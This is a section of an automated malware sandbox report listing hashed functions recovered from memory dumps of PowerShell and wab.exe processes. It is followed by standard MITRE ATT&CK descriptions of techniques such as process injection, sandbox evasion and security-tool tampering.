Opcode Fuzzy Hash: 9fbf183b453ec0bbf8c5f5f18943442cd5e68ff2fea7e5ec34bdf6435aa71f7e
Instruction Fuzzy Hash: E6E0C2B2F541159BD725616D68121E973568BDD1A471044B3D902C7300EA328C1797E0

Function 077817F7 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54258df4ce8f93253edb3846aa406998517867344810aa66c3c3aed414a0cd57
Instruction ID: 3223566325b464b92b73e766a194c18c2b284c9605d8020cdeccab8adb753bbf
Opcode Fuzzy Hash: 54258df4ce8f93253edb3846aa406998517867344810aa66c3c3aed414a0cd57
Instruction Fuzzy Hash: C2B012711051404FC241CB50C850444BB30DF92104318C4CAD4048B293CB23DE03C740

Non-executed Functions

Function 02E7D6E0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1622564839.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9258b54fcb5c22d4b0ffd421295f4e232f54d773991a7c82f90d641067c4d283
Instruction ID: 382cbc262d5d31b6b295bc05b15e45fd06377bb325a9e0c9337882545acd41b7
Opcode Fuzzy Hash: 9258b54fcb5c22d4b0ffd421295f4e232f54d773991a7c82f90d641067c4d283
Instruction Fuzzy Hash: D621D076684344DFDB15DF10DDC0B26BF65FF88324F24C569E8094B246C336D856CAA2

Function 0778E7E0 Relevance: 8.9, Strings: 7, Instructions: 196COMMON

Download Yara Rule

Strings

tPq, xrefs: 0778EA2C
(q, xrefs: 0778EA56
(q, xrefs: 0778E9F2
tPq, xrefs: 0778E931
(q, xrefs: 0778EA60
4'q, xrefs: 0778EB04
$q, xrefs: 0778E85D

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$tPq$tPq$$q$(q$(q$(q
API String ID: 0-3442133670
Opcode ID: c9489f2364e74882d1f1e45ea39adfbcb58456a271f3b580ec65b4ad299db13f
Instruction ID: 95d7775afd511287821066cdcceb8032a02d6389ac2ac7b48520cae0c1dec32a
Opcode Fuzzy Hash: c9489f2364e74882d1f1e45ea39adfbcb58456a271f3b580ec65b4ad299db13f
Instruction Fuzzy Hash: 0B61C5B0B40216DFDBA4EE45C541B79B7E2BF45791F188969E8056F390C7B1EC80CB92

Function 0778E47D Relevance: 8.9, Strings: 7, Instructions: 163COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778E6EE
$q, xrefs: 0778E50B
$q, xrefs: 0778E6BC
tPq, xrefs: 0778E5FE
TQq, xrefs: 0778E692
$q, xrefs: 0778E52C
TQq, xrefs: 0778E4EA

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
API String ID: 0-2980145124
Opcode ID: c4d23856c34fafbf654a03c53e7190d726752f9d526541cf5edbeb30329890b4
Instruction ID: 7e7e5dca284482cb99726da8a412d6ef399f1d0e76daa26ac900cc94dcb947e5
Opcode Fuzzy Hash: c4d23856c34fafbf654a03c53e7190d726752f9d526541cf5edbeb30329890b4
Instruction Fuzzy Hash: 745135B1780206DFDBA5EF04C9047AA77B2FF41394F588966E8099B291C7F1DD80CBA1

Function 0778E490 Relevance: 8.9, Strings: 7, Instructions: 153COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778E6EE
$q, xrefs: 0778E50B
$q, xrefs: 0778E6BC
tPq, xrefs: 0778E5FE
TQq, xrefs: 0778E692
$q, xrefs: 0778E52C
TQq, xrefs: 0778E4EA

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$TQq$TQq$tPq$$q$$q$$q
API String ID: 0-2980145124
Opcode ID: c2a919f9d5b80e9107127fee35a3ee3e1eb754bc28a6d97c43e29eb6453c9f60
Instruction ID: 6a031421fec156144c23cff876babcf347bd770d699ccb8d8031cd23c629b9e3
Opcode Fuzzy Hash: c2a919f9d5b80e9107127fee35a3ee3e1eb754bc28a6d97c43e29eb6453c9f60
Instruction Fuzzy Hash: 1D5136F0780206DFDFA4EE05C90476A73A2FF41395F58896AE8099B290C7F1DD80CBA1

Function 07787798 Relevance: 7.7, Strings: 6, Instructions: 195COMMON

Download Yara Rule

Strings

$q, xrefs: 077878FF
tPq, xrefs: 07787848
$q, xrefs: 0778792A
tPq, xrefs: 0778783C
$q, xrefs: 077877AC
$q, xrefs: 07787936

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: tPq$tPq$$q$$q$$q$$q
API String ID: 0-3638282964
Opcode ID: ed3263dea8f6d56ab8a2b9c4da4b213b5f820050d12200eb0d0359296ff69b5e
Instruction ID: f219c31026a57ee317b89ab28d714d657176ed0a2d67853a0ea62a937c73b1e5
Opcode Fuzzy Hash: ed3263dea8f6d56ab8a2b9c4da4b213b5f820050d12200eb0d0359296ff69b5e
Instruction Fuzzy Hash: 98517D71B443069FEB6966A9D801B76BBA2AFC1351F38847BE546CB291CA31C841C3E1

Function 0778F285 Relevance: 7.7, Strings: 6, Instructions: 194COMMON

Download Yara Rule

Strings

$q, xrefs: 0778F2DD
tPq, xrefs: 0778F364
XRq, xrefs: 0778F405
XRq, xrefs: 0778F3F5
tPq, xrefs: 0778F370
XRq, xrefs: 0778F2C1

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: XRq$XRq$XRq$tPq$tPq$$q
API String ID: 0-422185277
Opcode ID: c63a83ca333c27bcaed217a855807372ccf8a2af61d33eb025f7bc2f865f34c7
Instruction ID: 5888d10753ef8440ef52149f4f8b9a11af03873e6864ef84019b74a6ff01f3eb
Opcode Fuzzy Hash: c63a83ca333c27bcaed217a855807372ccf8a2af61d33eb025f7bc2f865f34c7
Instruction Fuzzy Hash: F2613B71B502069FDB64AB65C401B6EBBF2BF89350F28C46AE905AF381CB31DC41C7A1

Function 0778A878 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$q, xrefs: 0778A8F3
$q, xrefs: 0778A8CB
$q, xrefs: 0778A8AF
$q, xrefs: 0778A8FF
$q, xrefs: 0778A90F
$q, xrefs: 0778A91B

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 8c1e42df4b93dab0a19454e7643be2d894fc2787d256f11b4c3f1014d4a38b2f
Instruction ID: 6f90f3b1f59f821aceb1534bce3828efb6fc91bf79225cd591d6c5bdbf5049dc
Opcode Fuzzy Hash: 8c1e42df4b93dab0a19454e7643be2d894fc2787d256f11b4c3f1014d4a38b2f
Instruction Fuzzy Hash: 59315F72B483078FDBBA2666E850276F7A1BFC1151B2BC87FD8828B241DE31D416C761

Function 07780470 Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

$q, xrefs: 07780535
4'q, xrefs: 0778056A
$q, xrefs: 07780541
$q, xrefs: 077804FC
4'q, xrefs: 0778055E

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: e40869f07facb71aeef53c6209e4518c2bbb3ee2fb0fd6a3cd8683253f03b513
Instruction ID: 487b379620e00a3b281f903b26f9789f07c972e81514aaa6eb5b267168047dd5
Opcode Fuzzy Hash: e40869f07facb71aeef53c6209e4518c2bbb3ee2fb0fd6a3cd8683253f03b513
Instruction Fuzzy Hash: 0E419FB0B443168FDB656B75D814BBE7F619F82290F1484AAD902CB291DB31C949C7B1

Function 077821A0 Relevance: 6.4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778228E
$q, xrefs: 0778223C
$q, xrefs: 077821D7
$q, xrefs: 07782230
4'q, xrefs: 0778229A

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: a128bb8dade667c5c256400b98f33135aa6c33f70e8ce2197db9d0f15f9c66df
Instruction ID: 964197f45a336fc8992804978c981da2340d944101290734781c815d8113ce9e
Opcode Fuzzy Hash: a128bb8dade667c5c256400b98f33135aa6c33f70e8ce2197db9d0f15f9c66df
Instruction Fuzzy Hash: 5A41BEB5B40207DFDBB96A65E800276B7E1FF86293B29897BDC118B143DB31C801C711

Function 0778A468 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

tPq, xrefs: 0778A563
$q, xrefs: 0778A5DE
4'q, xrefs: 0778A613
$q, xrefs: 0778A4C5
$q, xrefs: 0778A4E1

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$tPq$$q$$q$$q
API String ID: 0-838716513
Opcode ID: 03fad63284628bbee048f22acb3f9b695ec3b818f9c2e66c8c7e322027c503ca
Instruction ID: d45b37f886cdcade65a95a93c8c4781fb1c00f69a6e274f86bc7689bd47c83c8
Opcode Fuzzy Hash: 03fad63284628bbee048f22acb3f9b695ec3b818f9c2e66c8c7e322027c503ca
Instruction Fuzzy Hash: 633127F1B80206DFDFA4AE45C544765B7A1EF493A0F1BC66BE8159B240CB31D880CF91

Function 0778D978 Relevance: 5.5, Strings: 4, Instructions: 488COMMON

Download Yara Rule

Strings

(oq, xrefs: 0778DA6E
(oq, xrefs: 0778DDB1
(oq, xrefs: 0778DA5E
(oq, xrefs: 0778DDA1

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq
API String ID: 0-3853041632
Opcode ID: f2c462b99df7509e53ff4a8b911ded36420a3f567456338c6f4be4f48cf76294
Instruction ID: ca69e6c445b210502289e375826081dbc0ad87ff3fb7d6b1e1368171031a568a
Opcode Fuzzy Hash: f2c462b99df7509e53ff4a8b911ded36420a3f567456338c6f4be4f48cf76294
Instruction Fuzzy Hash: A1F147B1744306DFDB64AF65C8447AABBA2EF8A390F14886BE505CB2D1CB31DC51C7A1

Function 07789630 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$q, xrefs: 07789642
$q, xrefs: 0778965E
$q, xrefs: 0778968C
$q, xrefs: 07789698

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 7e5e5ec0b3e6f384a5af1152227ddf0a71af9044f1f9aab45083a0ff28678d05
Instruction ID: 625d0cf83f96e6023b9b1c884baff9b5a1d1c57f7c10e9ab6b2cf7c6fab5966c
Opcode Fuzzy Hash: 7e5e5ec0b3e6f384a5af1152227ddf0a71af9044f1f9aab45083a0ff28678d05
Instruction Fuzzy Hash: E4216BB17503025BEB746A6ADC51B377ADA9FC0359F24883AE705CB381DE32F8018B20

Function 07780308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

4'q, xrefs: 0778037F
$q, xrefs: 0778035E
$q, xrefs: 07780352
4'q, xrefs: 07780373

Memory Dump Source

Source File: 00000002.00000002.1631282064.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7780000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q
API String ID: 0-3199993180
Opcode ID: 6952938d8f90e812ed2466677e8208b6b6e2d813be0fb09f56385f99326f3220
Instruction ID: f6c8243c13af695115a79ec95dd8930ba83a6ea073c752abd48ba8077acc9734
Opcode Fuzzy Hash: 6952938d8f90e812ed2466677e8208b6b6e2d813be0fb09f56385f99326f3220
Instruction Fuzzy Hash: C701DF5178D3864FD36B62A5A8201A92FB24F8329071E44EBD881DF697CE558C0AC3A7

Analysis Process: wab.exePID: 7476, Parent PID: 424COMMON

Executed Functions

Function 02F23E09 Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

$q, xrefs: 02F23E2E
Xq, xrefs: 02F23E47

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID: Xq$$q
API String ID: 0-855381642
Opcode ID: 93aa73061acfa21bc7523bb4a9064fef69da83788dcfd22b690edcc2cc846423
Instruction ID: 21cef93f65d3742f78bb74b22eba407d8da125d19a3e83df9dc776988bd89f83
Opcode Fuzzy Hash: 93aa73061acfa21bc7523bb4a9064fef69da83788dcfd22b690edcc2cc846423
Instruction Fuzzy Hash: E4F17A34F04218CFDB18DFB9D8906AEBBB2BF89340B14896ED506A7358DF359806CB50

Function 02F23CB1 Relevance: 2.6, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

Xq, xrefs: 02F23CCD
Xq, xrefs: 02F23CF6

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: cc28f1038836cb634a9eed87b998e1c12f916590fea184ea2e5fca3984bcd771
Instruction ID: fdc5e5111d590ada007fca1f344425eb7d2e6ae50869c471446213daad83634b
Opcode Fuzzy Hash: cc28f1038836cb634a9eed87b998e1c12f916590fea184ea2e5fca3984bcd771
Instruction Fuzzy Hash: B9311672F443384BDF284669489537EB6A6FBC6281F58447EE907C7281DB7CC80A8751

Function 02F20C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON

Download Yara Rule

Strings

LRq, xrefs: 02F20F19

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: 2d6bc4f03e04f005b2c7567a82ac469a913b93836cee076b83dcd44f1194a814
Instruction ID: 2db2cc8cae87585094ad7d6a4af9a2055096c4863b077054f4168ae0293c5d13
Opcode Fuzzy Hash: 2d6bc4f03e04f005b2c7567a82ac469a913b93836cee076b83dcd44f1194a814
Instruction Fuzzy Hash: 4C520D74D80219DFCB64DF24CD94A9DBBB2FB88301F5049A9D819AB358EB346D89CF50

Function 02F20CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRq, xrefs: 02F20F19

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: acb5a4dfb628ed48da0ac32eccc0c387d9ca7c0e5e4dbc19142328d28ea313de
Instruction ID: 327c0770266c059073c93c8c6ecf456ce812f63905bbcd6b141c4f8ad9caeb82
Opcode Fuzzy Hash: acb5a4dfb628ed48da0ac32eccc0c387d9ca7c0e5e4dbc19142328d28ea313de
Instruction Fuzzy Hash: 26520E74D80219DFCB64DF24CD94A9DBBB2FB88301F5049A9D819AB358EB346D89CF50

Function 02F228F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658df72414da2a3a7e89ad1a3efd4f1400c533b5fca56677c6101bc4d6f58842
Instruction ID: 7256ec7164983f6b979d5026618eeab9234e47bfb2efee8d094bcf6b7ab7030d
Opcode Fuzzy Hash: 658df72414da2a3a7e89ad1a3efd4f1400c533b5fca56677c6101bc4d6f58842
Instruction Fuzzy Hash: 9421B275E002159FCB14CF28C450BAE7BA5EB9D3A0F61C519DD099B248EB31EA4ACBD1

Function 02F227F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6fc6b47ce3078fd0d9656b69c208ebfcb52a2dd5b503a40a63c2c7b46180acc
Instruction ID: 1d124d9495b5e67e84d9213853967205552485107e40ac4ee1af21636ad23e09
Opcode Fuzzy Hash: e6fc6b47ce3078fd0d9656b69c208ebfcb52a2dd5b503a40a63c2c7b46180acc
Instruction Fuzzy Hash: FA21CEB5D0021A9FCB04EFA9C9456EEBFF0FB19210F10516AD91AB2210EB345A85CBA0

Function 02F228A2 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4eb71e6ccf2f0a448fd60efbde07c2b23702ebc24fba2b1ad675303652df68
Instruction ID: 06156f5c3edf02e64bb770385f059df5c0fba2348016b035525c3abc7c0ce132
Opcode Fuzzy Hash: 2c4eb71e6ccf2f0a448fd60efbde07c2b23702ebc24fba2b1ad675303652df68
Instruction Fuzzy Hash: C2E08636E2032696C705E7A4DC041EEB774AF95322F55C62BC12132184EB31525987A1

Function 02F228B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a62c00698a113b001d4e7ec8d4fc0514fa3cb8fa61f346c88a077ae0c5520d5
Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
Opcode Fuzzy Hash: 9a62c00698a113b001d4e7ec8d4fc0514fa3cb8fa61f346c88a077ae0c5520d5
Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1

Non-executed Functions

Function 02F229E0 Relevance: 5.5, Strings: 4, Instructions: 470COMMON

Download Yara Rule

Strings

Xq, xrefs: 02F22B57
Xq, xrefs: 02F22BA4
Xq, xrefs: 02F22AD8
Xq, xrefs: 02F22A9E

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 3432605faba6fe7a991ce8697d802daef6e9758773b9b607deceb4237b81609f
Instruction ID: 38ed6c5edd3c4b138dccf1973abc8759d37bdb77f9488fd6e00764c314e1fde3
Opcode Fuzzy Hash: 3432605faba6fe7a991ce8697d802daef6e9758773b9b607deceb4237b81609f
Instruction Fuzzy Hash: A312E17390A6D09FEB224BB844A43EFBFF29FC7108B8904DAD4C64650BDA65D41BC754

Function 02F22A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

Xq, xrefs: 02F22B57
Xq, xrefs: 02F22BA4
Xq, xrefs: 02F22AD8
Xq, xrefs: 02F22A9E

Memory Dump Source

Source File: 0000000E.00000002.1923243781.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2f20000_wab.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: d12053d5bc3fafb44c264d7b5301fa9fa8c7828d45bc57d6f6f8e9692957e8f6
Instruction ID: 65343b372163edd83b7c901e538df72801a33da36f949b515129dbb0b2796686
Opcode Fuzzy Hash: d12053d5bc3fafb44c264d7b5301fa9fa8c7828d45bc57d6f6f8e9692957e8f6
Instruction Fuzzy Hash: A7314571E003394BEF748FB9885177EB6B6BB8A380F154069C919A7240DB748989CF92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

